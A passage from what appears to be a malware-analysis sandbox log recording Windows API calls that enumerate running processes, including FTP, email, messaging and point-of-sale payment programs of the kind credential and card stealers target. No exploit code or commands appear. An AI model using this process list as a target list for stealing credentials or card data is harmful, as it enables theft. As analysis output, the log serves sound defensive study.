th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0227.127] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0227.129] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0227.130] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0227.132] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0227.133] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0227.134] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0227.171] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0227.172] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0227.174] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0227.175] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0227.177] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0227.179] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0227.181] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0227.183] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0227.184] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0227.186] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0227.188] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0227.190] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0227.192] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0227.193] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0227.195] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0227.197] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0227.199] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0227.201] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0227.203] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0227.204] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0227.206] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0227.208] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0227.210] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0227.211] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0227.213] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0227.236] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0227.238] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0227.239] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0227.241] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0227.242] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0227.244] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0227.251] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0227.255] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0227.259] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0227.264] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0227.266] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0227.269] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0227.271] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0227.273] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0227.275] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0227.313] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0227.315] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0227.317] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0227.319] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0227.320] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0227.321] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0227.327] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0227.328] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0227.330] CloseHandle (hObject=0xdc4) returned 1 [0227.330] Sleep (dwMilliseconds=0x64) [0227.477] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0227.579] Process32First (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.581] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0227.582] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0227.584] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0227.585] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0227.586] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0227.588] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0227.592] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0227.593] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0227.595] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.596] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.597] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0227.599] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.600] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.601] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.603] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.610] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.612] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.614] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.616] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0227.618] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0227.619] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0227.623] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.625] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.626] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0227.628] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0227.630] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0227.632] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0227.633] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.635] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: 